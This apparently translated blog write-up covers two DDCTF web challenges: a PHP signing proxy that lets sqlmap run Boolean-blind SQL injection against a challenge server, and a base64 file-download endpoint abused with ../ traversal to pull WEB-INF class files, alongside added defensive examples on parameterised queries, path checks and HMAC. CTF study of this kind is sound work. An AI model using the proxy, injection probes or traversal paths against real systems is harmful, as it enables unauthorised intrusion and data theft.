Reproducing and thinking about DDCTF web

Web 1: Secret database

Challenge address: http://116.85.43.88:8080/ZVDHKBUVUZSTJCNX/dfe3ia/index.php

Henryzhao master's solution

Write a PHP page that acts as a signing proxy: it takes the request, computes the signature and forwards it. Then point common tools such as sqlmap at that PHP page and inject through it.


```php
<?php
// Signing proxy: takes the injection parameters from the tool (sqlmap), computes the
// signature the challenge expects, forwards the signed POST and relays the response.
@$id = $_REQUEST['id'];
@$title = $_REQUEST['title'];
@$author = $_REQUEST['author'];
@$date = $_REQUEST['date'];
$time = time();
// sha1 over the concatenated fields, the timestamp and the fixed secret
$sig = sha1('id='.$id.'title='.$title.'author='.$author.'date='.$date.'time='.$time.'adrefkfweodfsdpiru');

$ch = curl_init();

$post = [
    'id' => $id,
    'title' => $title,
    'author' => $author,
    'date' => $date,
];

curl_setopt($ch, CURLOPT_URL, "http://116.85.43.88:8080/KREKGJVFPYQKERQR/dfe3ia/index.php?sig=$sig&time=$time");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'X-Forwarded-For: 123.232.23.245',
));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$ch_out = curl_exec($ch);
$ch_info = curl_getinfo($ch);

// split the raw response into headers and body
$header = substr($ch_out, 0, $ch_info['header_size']);
$body = substr($ch_out, $ch_info['header_size']);

// relay the upstream status code so the injection tool sees the real response
http_response_code($ch_info['http_code']);

//echo $header;
echo $body;
```

I used to write a Python proxy as well; TODO:

Wfox master's solution

Unlocked a Burp Suite "new feature": Burp Suite's Match and Replace.

I do not know how the master fuzzed it; his testing process was:

```
admin' and 1 #   normally shows the admin result
admin' and 0 #   comes back empty
```

So this is Boolean-based blind injection: the condition is judged by whether the response body contains the admin / test result.
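To make the oracle above concrete, here is an added example (not the challenge's code or the master's script) that reproduces it against a constructed in-memory SQLite table: a string-concatenated query returns the admin row for the true probe and nothing for the false probe, while the parameterised version treats both probes as literal names. SQLite's comment syntax is `--` rather than MySQL's `#`, so the probes use `-- ` in place of the page's `#`; the table contents are constructed.

```python
import sqlite3

# Constructed sample data, not the challenge's real schema.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "administrator"), ("test", "user")])
    return con

# The page's two probes, with SQLite's '-- ' comment instead of MySQL's '#'.
TRUE_PROBE = "admin' and 1 -- "
FALSE_PROBE = "admin' and 0 -- "


def lookup_vulnerable(con, name):
    """String-concatenated query: the user-controlled value is parsed as SQL,
    so the trailing condition decides whether any row comes back."""
    sql = "SELECT name, role FROM users WHERE name = '%s'" % name
    return con.execute(sql).fetchall()


def lookup_safe(con, name):
    """Parameterised query: the value is bound as data and never parsed as SQL."""
    return con.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def response_body(rows):
    """Mimic what the tester saw: either the admin record or an empty page."""
    return rows[0][0] if rows else ""


if __name__ == "__main__":
    con = make_db()
    for probe in (TRUE_PROBE, FALSE_PROBE):
        print(repr(probe), "vulnerable ->", repr(response_body(lookup_vulnerable(con, probe))),
              "| safe ->", repr(response_body(lookup_safe(con, probe))))
```

The difference between the two outputs of `lookup_vulnerable` is the entire side channel a Boolean-blind test relies on; binding the value removes it because the database never sees the probe as syntax.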

Debugging the master's script is still quite troublesome, since you need to modify the JS; that is not for me, but his use of the third-party Python library execjs to execute JS code is worth learning about, even though the JS function being executed is just a sha1 function :)

Appendix: basics

curl

command line tool and library for transferring data with URLs

curl is a command-line tool whose job is to make a network request and then print the data it obtains to standard output (stdout). It supports multiple protocols; here are its various uses:

```shell
$ curl -o page.html URL        # save the page to a file
$ curl -i URL                  # show the response headers as well
$ curl -v www.sina.com         # -v shows the whole HTTP exchange, including the port and the request headers
$ curl -X POST --data "data=xxx" example.com/form.cgi
$ curl --header "Content-Type: application/json" http://example.com
$ curl --user name:password example.com   # HTTP authentication
```

It can also do form encoding, file uploads and so on.

See: http://www.ruanyifeng.com/blog/2011/09/curl.html

jsbeautifier: a JS beautifying tool

Web 2: Exclusive link

The masters are very sensitive to base64 in the HTML source:

```html
<title>滴滴一下,让出行更美好</title>
<link type="image/x-icon" href="http://www.xiaojukeji.com/images/favicon.ico" rel="icon">
<link href="/image/banner/ZmF2aWNvbi5pY28=" rel="shortcut icon">
```

Decoding the base64 gives favicon.ico. Opening the image in 010 Editor, we found that only .class, .xml, .ico and .ks files can be downloaded, which is enough to establish an arbitrary file download vulnerability.

Henryzhao master was more powerful: he directly noticed that the logo was abnormal...

In addition, under the master's guidance, the basic structure of the whole site can be worked out from a similar template on GitHub, i.e. a source code disclosure.

Spring's default configuration file is applicationContext.xml; you can also write your own configuration file, commonly named web.xml.

Found on the 500 error page:

com.didichuxing.ctf.controller.user.FlagController.submitFlag(FlagController.java:36)

Thus obtaining the corresponding path:

../../WEB-INF/classes/com/didichuxing/ctf/controller/user/FlagController.class

Using jd-gui (a Java decompiler) to get the Java source and the related decryption content behind it; not interested for now...
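The download endpoint above decoded a base64 file name and, by the page's account, served only .class/.xml/.ico/.ks files, yet still allowed `../` traversal out of the image directory into WEB-INF. As an added example (not the challenge's code), here is how a defender would resolve such a request in Python: decode the name, confine the resolved path to the base directory, and only then apply the extension allow-list. The directory layout and file contents in `demo()` are constructed.

```python
import base64
import binascii
import tempfile
from pathlib import Path

# The extensions the page says the endpoint was meant to serve.
ALLOWED_SUFFIXES = {".class", ".xml", ".ico", ".ks"}


def resolve_download(base_dir, encoded_name):
    """Return the Path to serve, or None if the request is rejected.

    encoded_name is the base64 path component, e.g. 'ZmF2aWNvbi5pY28=' (favicon.ico).
    """
    try:
        name = base64.b64decode(encoded_name, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not name or "\x00" in name:
        return None
    base = Path(base_dir).resolve()
    candidate = (base / name).resolve()
    # The resolved path must stay inside base_dir; this blocks ../ traversal,
    # absolute paths and symlinks that point outside the directory.
    if candidate != base and base not in candidate.parents:
        return None
    # Allow-list the extension only after the containment check, so a permitted
    # suffix cannot rescue a path that already escaped.
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    if not candidate.is_file():
        return None
    return candidate


def demo():
    """Constructed layout mirroring the page: /image holds the favicon, WEB-INF holds classes."""
    root = Path(tempfile.mkdtemp())
    image = root / "image"
    image.mkdir()
    (image / "favicon.ico").write_bytes(b"\x00\x00\x01\x00")
    (image / "notes.txt").write_text("not servable")
    classes = root / "WEB-INF" / "classes"
    classes.mkdir(parents=True)
    (classes / "FlagController.class").write_bytes(b"\xca\xfe\xba\xbe")

    def enc(s):
        return base64.b64encode(s.encode()).decode()

    return {
        "favicon": resolve_download(image, enc("favicon.ico")),
        "traversal": resolve_download(image, enc("../WEB-INF/classes/FlagController.class")),
        "bad_ext": resolve_download(image, enc("notes.txt")),
        "garbage": resolve_download(image, "not base64!!"),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label:10s} -> {result}")
```

Note the order of checks: containment first, allow-list second. Checking the suffix alone is exactly what lets `../../WEB-INF/classes/.../FlagController.class` through, because it ends in `.class`.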

Appendix: basics

JVM

JVM (Java Virtual Machine): a virtual machine that can run Java bytecode; it is what gives the Java language its most important feature, platform independence.

Java compiler: compiles Java source files (.java) into bytecode (.class files, a special binary format); javac.exe can simply be regarded as the Java compiler.

Java interpreter: part of the JVM; it interprets and executes the program produced by the Java compiler. java.exe can simply be regarded as the Java interpreter.

HMAC

HMAC (Hash-based Message Authentication Code): a keyed hash message authentication code; it takes a key and a message as input and produces a message digest as output.
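The Web 1 proxy signed requests with plain sha1 over the concatenated fields plus a fixed secret. As an added example (not from the page or the challenge), the Python below reimplements that scheme next to a proper HMAC-SHA256 over a length-prefixed encoding, and shows why the difference matters: with bare concatenation two different parameter sets produce the same signature, while the HMAC version separates them and `verify()` additionally enforces a timestamp window and a constant-time comparison. The secret is the one in the proxy script; `ALLOWED_SKEW` and the two parameter sets are assumptions.

```python
import hashlib
import hmac
import time

SECRET = b"adrefkfweodfsdpiru"   # the secret embedded in the page's proxy script
ALLOWED_SKEW = 300               # seconds; assumed policy, not from the page


def page_style_sig(params, t, secret=SECRET):
    """The proxy's scheme: sha1 over 'id=..title=..author=..date=..time=..' plus the secret."""
    msg = "id={id}title={title}author={author}date={date}time={t}".format(t=t, **params)
    return hashlib.sha1(msg.encode() + secret).hexdigest()


def hmac_sig(params, t, secret=SECRET):
    """Same fields, but each one length-prefixed so the encoding is unambiguous,
    then authenticated with HMAC-SHA256 instead of a bare hash."""
    parts = [params["id"], params["title"], params["author"], params["date"], str(t)]
    msg = b"".join(len(p.encode()).to_bytes(4, "big") + p.encode() for p in parts)
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def verify(params, t, sig, now=None, secret=SECRET):
    """Server-side check: reject stale timestamps, then compare in constant time."""
    now = time.time() if now is None else now
    if abs(now - t) > ALLOWED_SKEW:
        return False
    return hmac.compare_digest(hmac_sig(params, t, secret), sig)


# Constructed parameter sets that collide under plain concatenation:
# 'id=' + '1title=' + 'title=' + 'a'  ==  'id=' + '1' + 'title=' + 'title=a'
P1 = {"id": "1title=", "title": "a", "author": "b", "date": "c"}
P2 = {"id": "1", "title": "title=a", "author": "b", "date": "c"}

if __name__ == "__main__":
    t = int(time.time())
    print("sha1-concat collide:", page_style_sig(P1, t) == page_style_sig(P2, t))
    print("hmac collide:       ", hmac_sig(P1, t) == hmac_sig(P2, t))
    print("verify P1 fresh:    ", verify(P1, t, hmac_sig(P1, t)))
    print("verify P1 stale:    ", verify(P1, t - 3600, hmac_sig(P1, t - 3600)))
```

The collision is a canonicalisation problem rather than a weakness of sha1 itself: without delimiters or length prefixes, field boundaries are ambiguous, so the signature binds a string, not the parameters. HMAC with a keyed construction and an unambiguous encoding fixes both halves.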


Source: www.cnblogs.com/petewell/p/11584609.html